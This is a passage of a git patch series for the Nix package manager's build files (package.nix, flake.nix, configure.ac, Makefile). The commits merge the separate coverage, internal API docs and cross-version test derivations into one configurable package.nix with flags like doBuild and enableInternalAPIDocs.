b/coverage.nix index f952d8b09..2c5e4a06d 100644 --- a/coverage.nix +++ b/coverage.nix @@ -26,12 +26,4 @@ releaseTools.coverageAnalysis { ; enableParallelBuilding = true; - - dontInstall = false; - - lcovFilter = [ "*/boost/*" "*-tab.*" ]; - - hardeningDisable = ["fortify"]; - - NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; } diff --git a/flake.nix b/flake.nix index fbce13604..44ce2d306 100644 --- a/flake.nix +++ b/flake.nix @@ -276,7 +276,12 @@ coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./internal-api-docs.nix {}; + internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { + doBuild = false; + doCheck = false; + doInstallCheck = false; + enableInternalAPIDocs = true; + }; # System tests. tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { diff --git a/internal-api-docs.nix b/internal-api-docs.nix deleted file mode 100644 index ddd3fa891..000000000 --- a/internal-api-docs.nix +++ /dev/null @@ -1,24 +0,0 @@ -{ nix -, doxygen -}: - -nix.overrideAttrs (old: { - pname = "nix-internal-api-docs"; - - configureFlags = old.configureFlags ++ [ - "--enable-internal-api-docs" - ]; - nativeBuildInputs = old.nativeBuildInputs ++ [ - doxygen - ]; - - dontBuild = true; - doCheck = false; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; -}) diff --git a/package.nix b/package.nix index c1a3b9455..39fee8472 100644 --- a/package.nix +++ b/package.nix @@ -1,6 +1,7 @@ { lib , callPackage , stdenv +, releaseTools , versionSuffix ? "" , officialRelease ? false , buildUnreleasedNotes ? 
false @@ -21,6 +22,7 @@ , git , gtest , jq +, doxygen , libarchive , libcpuid , libgit2 @@ -45,16 +47,35 @@ # faithfully reflects how the underlying configure + make build system # work. The top-level flake.nix will choose useful combinations. +, pname ? "nix" + +, doBuild ? true +, doCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform +, doInstallCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform + +, withCoverageChecks ? false + +# Whether to build the internal API docs, can be done separately from +# everything else. +, enableInternalAPIDocs ? false + # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. , installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform + +, test-daemon ? null +, test-client ? null }: let version = lib.fileContents ./.version + versionSuffix; canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + attrs = { + inherit doBuild doCheck doInstallCheck; + }; + filesets = { baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; @@ -78,17 +99,30 @@ let (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) ]; }; + + mkDerivation = + if withCoverageChecks + then releaseTools.coverageAnalysis + else stdenv.mkDerivation; in -stdenv.mkDerivation (finalAttrs: let +mkDerivation (finalAttrs: let + + inherit (finalAttrs) + doCheck + doInstallCheck + ; + + doBuild = !finalAttrs.dontBuild; # Either running the unit tests during the build, or installing them # to be run later, requiresthe unit tests to be built. 
- buildUnitTests = finalAttrs.doCheck || installUnitTests; + buildUnitTests = doCheck || installUnitTests; + + anySortOfTesting = buildUnitTests || doInstallCheck; in { - pname = "nix"; - inherit version; + inherit pname version; src = let @@ -96,9 +130,10 @@ in { in fileset.toSource { root = ./.; - fileset = fileset.intersect filesets.baseFiles (fileset.unions [ + fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ filesets.configureFiles filesets.topLevelBuildFiles + ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc @@ -107,8 +142,9 @@ in { ./unit-test-data ./COPYING ./scripts/local.mk + ] ++ lib.optionals anySortOfTesting [ filesets.functionalTestFiles - ]); + ])); }; VERSION_SUFFIX = versionSuffix; @@ -159,7 +195,13 @@ in { }) ; - doCheck = stdenv.hostPlatform != stdenv.buildPlatform; + propagatedBuildInputs = [ + boehmgc + nlohmann_json + ]; + + dontBuild = !attrs.doBuild; + doCheck = attrs.doCheck; checkInputs = [ # see buildInputs. The configure script always wants its test libs @@ -169,11 +211,8 @@ in { git mercurial openssh - ]; - - propagatedBuildInputs = [ - boehmgc - nlohmann_json + ] ++ lib.optionals enableInternalAPIDocs [ + doxygen ]; disallowedReferences = [ boost ]; @@ -198,30 +237,41 @@ in { ''} ''; - configureFlags = - lib.optionals stdenv.isLinux [ - "--with-boost=${boost}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] - ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) - "LDFLAGS=-fuse-ld=gold" - ++ [ "--sysconfdir=/etc" ] + configureFlags = [ + "--sysconfdir=/etc" + (lib.enableFeature doBuild "build") + (lib.enableFeature anySortOfTesting "test") + (lib.enableFeature enableInternalAPIDocs "internal-api-docs") + (lib.enableFeature canRunInstalled "doc-gen") + (lib.enableFeature installUnitTests "install-unit-tests") + ] ++ lib.optionals installUnitTests [ + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + 
"--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ] ++ lib.optionals stdenv.isLinux [ + "--with-boost=${boost}/lib" + "--with-sandbox-shell=${sh}/bin/busybox" + ] ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) + "LDFLAGS=-fuse-ld=gold" ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" - ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" - ++ lib.optionals installUnitTests [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] - ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; + ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; enableParallelBuilding = true; makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; + installTargets = lib.optional doBuild "install" + ++ lib.optional enableInternalAPIDocs "internal-api-html"; + installFlags = "sysconfdir=$(out)/etc"; - postInstall = '' + # In this case we are probably just running tests, and so there isn't + # anything to install, we just make an empty directory to signify tests + # succeeded. 
+ installPhase = if finalAttrs.installTargets != [] then null else '' + mkdir -p $out + ''; + + postInstall = lib.optionalString doBuild '' mkdir -p $doc/nix-support echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products ${lib.optionalString stdenv.hostPlatform.isStatic '' @@ -238,19 +288,29 @@ in { $out/lib/libboost_regex.dylib \ $out/lib/libnixexpr.dylib ''} + '' + lib.optionalString enableInternalAPIDocs '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products ''; - doInstallCheck = finalAttrs.doCheck; + doInstallCheck = attrs.doInstallCheck; + installCheckFlags = "sysconfdir=$(out)/etc"; installCheckTarget = "installcheck"; # work around buggy detection in stdenv + # Needed for tests if we are not doing a build, but testing existing + # built Nix. + preInstallCheck = lib.optionalString (! doBuild) '' + mkdir -p src/nix-channel + ''; + separateDebugInfo = !stdenv.hostPlatform.isStatic; strictDeps = true; hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru ={ + passthru = { inherit filesets; perl-bindings = callPackage ./perl { @@ -258,6 +318,25 @@ in { }; }; - meta.platforms = lib.platforms.unix; - meta.mainProgram = "nix"; + meta = { + platforms = lib.platforms.unix; + mainProgram = "nix"; + broken = !(lib.all (a: a) [ + (installUnitTests -> doBuild) + (doCheck -> doBuild) + ]); + }; + +} // lib.optionalAttrs withCoverageChecks { + lcovFilter = [ "*/boost/*" "*-tab.*" ]; + + hardeningDisable = ["fortify"]; + + NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; + + dontInstall = false; +} // lib.optionalAttrs (test-daemon != null) { + NIX_DAEMON_PACKAGE = test-daemon; +} // lib.optionalAttrs (test-client != null) { + NIX_CLIENT_PACKAGE = test-client; }) diff --git a/test-nix-versions.nix b/test-nix-versions.nix index 15f6cd8d0..bda4621a1 100644 --- a/test-nix-versions.nix +++ b/test-nix-versions.nix @@ -6,45 +6,10 @@ }: 
stdenv.mkDerivation { - NIX_DAEMON_PACKAGE = daemon; - NIX_CLIENT_PACKAGE = client; name = "nix-tests" + lib.optionalString (lib.versionAtLeast daemon.version "2.4pre20211005" && lib.versionAtLeast client.version "2.4pre20211005") "-${client.version}-against-${daemon.version}"; - - inherit (client) - version - VERSION_SUFFIX - nativeBuildInputs - buildInputs - propagatedBuildInputs - ; - - src = fileset.toSource { - root = ./.; - fileset = with client.passthru.filesets; - fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles - functionalTestFiles - ]); - }; - - configureFlags = client.configureFlags # otherwise configure fails - ++ [ "--disable-build" ]; - - dontBuild = true; - doInstallCheck = true; - - installPhase = '' - mkdir -p $out - ''; - - installCheckPhase = '' - mkdir -p src/nix-channel - make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES - ''; } From 3d47e024837a4340b1a0b6b6b8114e9e9e0c38a4 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 16:48:50 -0500 Subject: [PATCH 032/654] WIP --- flake.nix | 9 +++--- package.nix | 90 +++++++++++++++++++++++++++++++---------------------- 2 files changed, 56 insertions(+), 43 deletions(-) diff --git a/flake.nix b/flake.nix index 44ce2d306..85ea1d052 100644 --- a/flake.nix +++ b/flake.nix @@ -153,7 +153,7 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - sh = final.busybox-sandbox-shell or (final.busybox.override { + default-busybox-sandbox-shell = final.busybox.override { useMusl = true; enableStatic = true; enableMinimal = true; @@ -175,7 +175,7 @@ CONFIG_ASH_PRINTF y CONFIG_ASH_TEST y ''; - }); + }; boehmgc = (final.boehmgc.override { enableLargeConfig = true; @@ -192,10 +192,10 @@ inherit boehmgc fileset - sh stdenv versionSuffix ; + busybox-sandbox-shell = final.busybox-sandbox-shell or default-busybox-sandbox-shell; boost = final.boost.override { enableIcu = false; }; libgit2 
= final.libgit2.overrideAttrs (attrs: { src = libgit2; @@ -277,9 +277,8 @@ # API docs for Nix's unstable internal C++ interfaces. internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { + inherit fileset; doBuild = false; - doCheck = false; - doInstallCheck = false; enableInternalAPIDocs = true; }; diff --git a/package.nix b/package.nix index 39fee8472..15fe52b07 100644 --- a/package.nix +++ b/package.nix @@ -36,11 +36,12 @@ , openssl , pkg-config , rapidcheck -, sh , sqlite , util-linux , xz +, busybox-sandbox-shell ? null + # Configuration Options # # This probably seems like too many degrees of freedom, but it @@ -50,11 +51,13 @@ , pname ? "nix" , doBuild ? true -, doCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform -, doInstallCheck ? stdenv.buildPlatform.canExecute stdenv.hostPlatform +, doCheck ? __forDefaults.canRunInstalled +, doInstallCheck ? __forDefaults.canRunInstalled , withCoverageChecks ? false +# Whether to build the regular manual +, enableManual ? __forDefaults.canRunInstalled # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -62,16 +65,26 @@ # Whether to install unit tests. This is useful when cross compiling # since we cannot run them natively during the build, but can do so # later. -, installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform +, installUnitTests ? __forDefaults.canRunInstalled +# For running the functional tests against a pre-built Nix. Probably +# want to use in conjunction with `doBuild = false;`. , test-daemon ? null , test-client ? null -}: + +# Not a real argument, just the only way to approximate let-binding some +# stuff for argument defaults. +, __forDefaults ? 
{ + canRunInstalled = doBuild && stdenv.buildPlatform.canExecute stdenv.hostPlatform; + } +} @ attrs0: let version = lib.fileContents ./.version + versionSuffix; - canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + # selected attributes with defaults, will be used to define some + # things which should instead be gotten via `finalAttrs` in order to + # work with overriding. attrs = { inherit doBuild doCheck doInstallCheck; }; @@ -149,7 +162,11 @@ in { VERSION_SUFFIX = versionSuffix; - outputs = [ "out" "dev" "doc" ] + outputs = [ "out" ] + ++ lib.optional doBuild "dev" + # If we are doing just build or just docs, the one thing will use + # "out". We only need additional outputs if we are doing both. + ++ lib.optional (doBuild && (enableManual || enableInternalAPIDocs)) "doc" ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ @@ -164,10 +181,11 @@ in { pkg-config ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a changelog + # Official releases don't have rl-next, so we don't need to compile a + # changelog ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; - buildInputs = [ + buildInputs = lib.optionals doBuild [ boost brotli bzip2 @@ -180,19 +198,14 @@ in { openssl sqlite xz - - # These could be checkInputs but the configure phase fails w/o them - gtest - rapidcheck - ] - ++ lib.optional stdenv.isLinux libseccomp - ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid - # There have been issues building these dependencies - ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && (stdenv.isLinux || stdenv.isDarwin)) - (aws-sdk-cpp.override { - apis = ["s3" "transfer"]; - customMemoryManagement = false; - }) + ] ++ lib.optional stdenv.isLinux libseccomp + ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid + # There have been issues building these dependencies + ++ lib.optional (stdenv.hostPlatform == stdenv.buildPlatform && 
(stdenv.isLinux || stdenv.isDarwin)) + (aws-sdk-cpp.override { + apis = ["s3" "transfer"]; + customMemoryManagement = false; + }) ; propagatedBuildInputs = [ @@ -204,7 +217,8 @@ in { doCheck = attrs.doCheck; checkInputs = [ - # see buildInputs. The configure script always wants its test libs + gtest + rapidcheck ]; nativeCheckInputs = [ @@ -242,17 +256,17 @@ in { (lib.enableFeature doBuild "build") (lib.enableFeature anySortOfTesting "test") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") - (lib.enableFeature canRunInstalled "doc-gen") + (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") ] ++ lib.optionals installUnitTests [ "--with-check-bin-dir=${builtins.placeholder "check"}/bin" "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ] ++ lib.optionals stdenv.isLinux [ + ] ++ lib.optionals (doBuild && stdenv.isLinux) [ "--with-boost=${boost}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) + "--with-sandbox-shell=${busybox-sandbox-shell}/bin/busybox" + ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" - ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" + ++ lib.optional (doBuild && stdenv.hostPlatform.isStatic) "--enable-embedded-sandbox-shell" ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; enableParallelBuilding = true; @@ -271,14 +285,14 @@ in { mkdir -p $out ''; - postInstall = lib.optionalString doBuild '' - mkdir -p $doc/nix-support - echo "doc manual $doc/share/doc/nix/manual" >> $doc/nix-support/hydra-build-products - ${lib.optionalString stdenv.hostPlatform.isStatic '' + postInstall = lib.optionalString doBuild ( + '' + mkdir -p $doc/nix-support + echo "doc manual $doc/share/doc/nix/manual" >> 
$doc/nix-support/hydra-build-products + '' + lib.optionalString stdenv.hostPlatform.isStatic '' mkdir -p $out/nix-support echo "file binary-dist $out/bin/nix" >> $out/nix-support/hydra-build-products - ''} - ${lib.optionalString stdenv.isDarwin '' + '' + lib.optionalString stdenv.isDarwin '' install_name_tool \ -change ${boost}/lib/libboost_context.dylib \ $out/lib/libboost_context.dylib \ @@ -287,10 +301,10 @@ in { -change ${boost}/lib/libboost_regex.dylib \ $out/lib/libboost_regex.dylib \ $out/lib/libnixexpr.dylib - ''} - '' + lib.optionalString enableInternalAPIDocs '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + '' + ) + lib.optionalString enableInternalAPIDocs '' + mkdir -p ''${!outputDoc}/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> ''${!outputDoc}/nix-support/hydra-build-products ''; doInstallCheck = attrs.doInstallCheck; From c71d987553530dcf02bcd7bf4c682634d7e5b6be Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 17:12:38 -0500 Subject: [PATCH 033/654] Fix incorrect flag name --- package.nix | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/package.nix b/package.nix index d2498ade2..f688cc819 100644 --- a/package.nix +++ b/package.nix @@ -254,7 +254,7 @@ in { configureFlags = [ "--sysconfdir=/etc" (lib.enableFeature doBuild "build") - (lib.enableFeature anySortOfTesting "test") + (lib.enableFeature anySortOfTesting "tests") (lib.enableFeature enableInternalAPIDocs "internal-api-docs") (lib.enableFeature enableManual "doc-gen") (lib.enableFeature installUnitTests "install-unit-tests") From 7b51086d736f8cf983744510ff40e5afbc313079 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:12:05 -0500 Subject: [PATCH 034/654] More fixes --- coverage.nix | 29 ---------------- flake.nix | 97 ++++++++++++++++++++++++++++++---------------------- package.nix | 61 
+++++++++++++++++++++------------ 3 files changed, 95 insertions(+), 92 deletions(-) delete mode 100644 coverage.nix diff --git a/coverage.nix b/coverage.nix deleted file mode 100644 index 2c5e4a06d..000000000 --- a/coverage.nix +++ /dev/null @@ -1,29 +0,0 @@ -{ lib -, releaseTools -, nix -, stdenv -}: - -let - inherit (nix) version; - -in - -releaseTools.coverageAnalysis { - name = "nix-coverage-${version}"; - - inherit (nix) - src - buildInputs - nativeBuildInputs - propagatedBuildInputs - configureFlags - makeFlags - installFlags - doInstallCheck - installCheckFlags - installCheckTarget - ; - - enableParallelBuilding = true; -} diff --git a/flake.nix b/flake.nix index aafcfd71b..fab8c45be 100644 --- a/flake.nix +++ b/flake.nix @@ -123,8 +123,20 @@ ''; testNixVersions = pkgs: client: daemon: - pkgs.callPackage ./test-nix-versions.nix { - inherit client daemon fileset; + pkgs.callPackage ./package.nix { + pname = + "nix-tests" + + lib.optionalString + (lib.versionAtLeast daemon.version "2.4pre20211005" && + lib.versionAtLeast client.version "2.4pre20211005") + "-${client.version}-against-${daemon.version}"; + + inherit fileset; + + test-client = client; + test-daemon = daemon; + + doBuild = false; }; binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { @@ -134,10 +146,6 @@ overlayFor = getStdenv: final: prev: let stdenv = getStdenv final; - - lowdown-nix = final.callPackage ./lowdown.nix { - inherit lowdown-src stdenv; - }; in { nixStable = prev.nix; @@ -145,6 +153,41 @@ # Forward from the previous stage as we don’t want it to pick the lowdown override inherit (prev) nixUnstable; + default-busybox-sandbox-shell = final.busybox.override { + useMusl = true; + enableStatic = true; + enableMinimal = true; + extraConfig = '' + CONFIG_FEATURE_FANCY_ECHO y + CONFIG_FEATURE_SH_MATH y + CONFIG_FEATURE_SH_MATH_64 y + + CONFIG_ASH y + CONFIG_ASH_OPTIMIZE_FOR_SIZE y + + CONFIG_ASH_ALIAS y + CONFIG_ASH_BASH_COMPAT y + CONFIG_ASH_CMDCMD y + CONFIG_ASH_ECHO y + 
CONFIG_ASH_GETOPTS y + CONFIG_ASH_INTERNAL_GLOB y + CONFIG_ASH_JOB_CONTROL y + CONFIG_ASH_PRINTF y + CONFIG_ASH_TEST y + ''; + }; + + lowdown-nix = final.callPackage ./lowdown.nix { + inherit lowdown-src stdenv; + }; + + libgit2-nix = final.libgit2.overrideAttrs (attrs: { + src = libgit2; + version = libgit2.lastModifiedDate; + cmakeFlags = attrs.cmakeFlags or [] + ++ [ "-DUSE_SSH=exec" ]; + }); + nix = let officialRelease = false; @@ -153,30 +196,6 @@ then "" else "pre${builtins.substring 0 8 (self.lastModifiedDate or self.lastModified or "19700101")}_${self.shortRev or "dirty"}"; - default-busybox-sandbox-shell = final.busybox.override { - useMusl = true; - enableStatic = true; - enableMinimal = true; - extraConfig = '' - CONFIG_FEATURE_FANCY_ECHO y - CONFIG_FEATURE_SH_MATH y - CONFIG_FEATURE_SH_MATH_64 y - - CONFIG_ASH y - CONFIG_ASH_OPTIMIZE_FOR_SIZE y - - CONFIG_ASH_ALIAS y - CONFIG_ASH_BASH_COMPAT y - CONFIG_ASH_CMDCMD y - CONFIG_ASH_ECHO y - CONFIG_ASH_GETOPTS y - CONFIG_ASH_INTERNAL_GLOB y - CONFIG_ASH_JOB_CONTROL y - CONFIG_ASH_PRINTF y - CONFIG_ASH_TEST y - ''; - }; - boehmgc = (final.boehmgc.override { enableLargeConfig = true; }).overrideAttrs(o: { @@ -195,18 +214,11 @@ stdenv versionSuffix ; - busybox-sandbox-shell = final.busybox-sandbox-shell or default-busybox-sandbox-shell; - libgit2 = final.libgit2.overrideAttrs (attrs: { - src = libgit2; - version = libgit2.lastModifiedDate; - cmakeFlags = attrs.cmakeFlags or [] - ++ [ "-DUSE_SSH=exec" ]; - }); - lowdown = lowdown-nix; officialRelease = false; + libgit2 = final.libgit2-nix; + lowdown = final.lowdown-nix; + busybox-sandbox-shell = final.busybox-sandbox-shell or final.default-busybox-sandbox-shell; }; - - inherit lowdown-nix; }; in { @@ -272,7 +284,10 @@ dockerImage = lib.genAttrs linux64BitSystems (system: self.packages.${system}.dockerImage); # Line coverage analysis. 
- coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; + coverage = nixpkgsFor.x86_64-linux.native.nix.override { + pname = "nix-coverage"; + withCoverageChecks = true; + }; # API docs for Nix's unstable internal C++ interfaces. internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./package.nix { diff --git a/package.nix b/package.nix index f688cc819..0758f989e 100644 --- a/package.nix +++ b/package.nix @@ -2,9 +2,6 @@ , callPackage , stdenv , releaseTools -, versionSuffix ? "" -, officialRelease ? false -, buildUnreleasedNotes ? false , autoconf-archive , autoreconfHook , aws-sdk-cpp @@ -43,21 +40,25 @@ , busybox-sandbox-shell ? null # Configuration Options -# +#: # This probably seems like too many degrees of freedom, but it # faithfully reflects how the underlying configure + make build system # work. The top-level flake.nix will choose useful combinations. , pname ? "nix" +, versionSuffix ? "" +, officialRelease ? false + , doBuild ? true , doCheck ? __forDefaults.canRunInstalled -, doInstallCheck ? __forDefaults.canRunInstalled +, doInstallCheck ? test-client != null || __forDefaults.canRunInstalled , withCoverageChecks ? false # Whether to build the regular manual , enableManual ? __forDefaults.canRunInstalled +, buildUnreleasedNotes ? false # Whether to build the internal API docs, can be done separately from # everything else. , enableInternalAPIDocs ? false @@ -115,7 +116,11 @@ let mkDerivation = if withCoverageChecks - then releaseTools.coverageAnalysis + then + # TODO support `finalAttrs` args function in + # `releaseTools.coverageAnalysis`. 
+ argsFun: + releaseTools.coverageAnalysis (let args = argsFun args; in args) else stdenv.mkDerivation; in @@ -146,6 +151,7 @@ in { fileset = fileset.intersect filesets.baseFiles (fileset.unions ([ filesets.configureFiles filesets.topLevelBuildFiles + ./doc/internal-api ] ++ lib.optionals doBuild [ ./boehmgc-coroutine-sp-fallback.diff ./doc @@ -170,20 +176,24 @@ in { ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ - bison - flex - (lib.getBin lowdown) - jq # Also for custom mdBook preprocessor. - mdbook - mdbook-linkcheck autoconf-archive autoreconfHook pkg-config - ] - ++ lib.optional stdenv.hostPlatform.isLinux util-linux - # Official releases don't have rl-next, so we don't need to compile a - # changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d; + ] ++ lib.optionals doBuild [ + bison + flex + ] ++ lib.optionals enableManual [ + (lib.getBin lowdown) + mdbook + mdbook-linkcheck + ] ++ lib.optionals (doInstallCheck || enableManual) [ + jq # Also for custom mdBook preprocessor. + ] ++ lib.optional stdenv.hostPlatform.isLinux util-linux + # Official releases don't have rl-next, so we don't need to compile a + # changelog + ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d + ++ lib.optional enableInternalAPIDocs doxygen + ; buildInputs = lib.optionals doBuild [ boost @@ -225,13 +235,11 @@ in { git mercurial openssh - ] ++ lib.optionals enableInternalAPIDocs [ - doxygen ]; disallowedReferences = [ boost ]; - preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) '' + preConfigure = lib.optionalString (doBuild && ! stdenv.hostPlatform.isStatic) '' # Copy libboost_context so we don't get all of Boost in our closure. 
# https://github.com/NixOS/nixpkgs/issues/45462 mkdir -p $out/lib @@ -307,7 +315,14 @@ in { doInstallCheck = attrs.doInstallCheck; installCheckFlags = "sysconfdir=$(out)/etc"; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv + # work around buggy detection in stdenv + installCheckTarget = "installcheck"; + + # work around weird bug where it doesn't want to do anything + installCheckPhase = if (!doBuild && doInstallCheck) then '' + mkdir -p src/nix-channel + make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES + '' else null; # Needed for tests if we are not doing a build, but testing existing # built Nix. @@ -317,7 +332,9 @@ in { separateDebugInfo = !stdenv.hostPlatform.isStatic; - strictDeps = true; + # TODO `releaseTools.coverageAnalysis` in Nixpkgs needs to be updated + # to work with `strictDeps`. + strictDeps = !withCoverageChecks; hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; From c160c6251566e758dd4d8fd409df3fa3b2f832b9 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 18:12:22 -0500 Subject: [PATCH 035/654] Fix underlying build system so `--disable-build` works better - Internal API docs once again work - configure skips checks for a bunch of things it doesn't need --- Makefile | 2 +- configure.ac | 50 ++++++++++++++++++++++++++++---------------------- 2 files changed, 29 insertions(+), 23 deletions(-) diff --git a/Makefile b/Makefile index eea297c89..0b2b408ca 100644 --- a/Makefile +++ b/Makefile @@ -61,7 +61,7 @@ include mk/lib.mk # by the library. Rules are not "lazy" like variables, unfortunately. 
ifeq ($(ENABLE_BUILD), yes) $(eval $(call include-sub-makefile, doc/manual/local.mk)) -$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) endif +$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) GLOBAL_CXXFLAGS += -g -Wall -include config.h -std=c++2a -I src diff --git a/configure.ac b/configure.ac index f8b937eb5..f9ad3c840 100644 --- a/configure.ac +++ b/configure.ac @@ -122,7 +122,6 @@ AC_PATH_PROG(flex, flex, false) AC_PATH_PROG(bison, bison, false) AC_PATH_PROG(dot, dot) AC_PATH_PROG(lsof, lsof, lsof) -NEED_PROG(jq, jq) AC_SUBST(coreutils, [$(dirname $(type -p cat))]) @@ -133,6 +132,30 @@ AC_ARG_WITH(store-dir, AS_HELP_STRING([--with-store-dir=PATH],[path of the Nix s AC_SUBST(storedir) +# Running the functional tests without building Nix is useful for testing +# different pre-built versions of Nix against each other. +AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), + ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) +AC_SUBST(ENABLE_BUILD) + +# Building without tests is useful for bootstrapping with a smaller footprint +# or running the tests in a separate derivation. Otherwise, we do compile and +# run them. +AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), + ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) +AC_SUBST(ENABLE_TESTS) + +# Building without API docs is the default as Nix' C++ interfaces are internal and unstable. +AC_ARG_ENABLE(internal_api_docs, AS_HELP_STRING([--enable-internal-api-docs],[Build API docs for Nix's internal unstable C++ interfaces]), + internal_api_docs=$enableval, internal_api_docs=no) +AC_SUBST(internal_api_docs) + +AS_IF( + [test "$ENABLE_BUILD" == "yes" || test "$ENABLE_TEST" == "yes"], + [NEED_PROG(jq, jq)]) + +AS_IF([test "$ENABLE_BUILD" == "yes"],[ + # Look for boost, a required dependency. # Note that AX_BOOST_BASE only exports *CPP* BOOST_CPPFLAGS, no CXX flags, # and CPPFLAGS are not passed to the C++ compiler automatically. 
@@ -155,18 +178,6 @@ if test "x$GCC_ATOMIC_BUILTINS_NEED_LIBATOMIC" = xyes; then LDFLAGS="-latomic $LDFLAGS" fi -# Running the functional tests without building Nix is useful for testing -# different pre-built versions of Nix against each other. -AC_ARG_ENABLE(build, AS_HELP_STRING([--disable-build],[Do not build nix]), - ENABLE_BUILD=$enableval, ENABLE_BUILD=yes) -AC_SUBST(ENABLE_BUILD) -# Building without tests is useful for bootstrapping with a smaller footprint -# or running the tests in a separate derivation. Otherwise, we do compile and -# run them. -AC_ARG_ENABLE(tests, AS_HELP_STRING([--disable-tests],[Do not build the tests]), - ENABLE_TESTS=$enableval, ENABLE_TESTS=yes) -AC_SUBST(ENABLE_TESTS) - AC_ARG_ENABLE(install-unit-tests, AS_HELP_STRING([--enable-install-unit-tests],[Install the unit tests for running later (default no)]), INSTALL_UNIT_TESTS=$enableval, INSTALL_UNIT_TESTS=no) AC_SUBST(INSTALL_UNIT_TESTS) @@ -179,11 +190,6 @@ AC_ARG_WITH(check-lib-dir, AS_HELP_STRING([--with-check-lib-dir=PATH],[path to i checklibdir=$withval, checklibdir=$libdir) AC_SUBST(checklibdir) -# Building without API docs is the default as Nix' C++ 